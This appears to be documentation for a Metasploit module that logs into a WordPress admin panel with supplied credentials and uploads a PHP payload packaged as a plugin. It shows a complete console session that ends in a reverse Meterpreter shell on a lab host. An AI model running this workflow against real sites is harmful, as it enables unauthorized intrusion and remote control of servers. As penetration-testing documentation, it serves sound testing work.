## Vulnerable Application

This module takes an administrator username and password, logs into the
admin panel, and uploads a payload packaged as a WordPress plugin.
Becuase this is authenticated code execution by design, it should work
on all versions of WordPress.

### Vulnerable Application Installation

You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
or from some Linux package managers. [Debian maintains an installation
guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
Note that in a default install of WP from apt, the plugins directory is
owned by root, so unless you chown it to the web user, this module will
not work. Doing so is common in real-world deployments to allow
legitimate administrators to install plugins, so it is not unreasonable
for your own installation.


## Verification Steps

```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php

meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >
```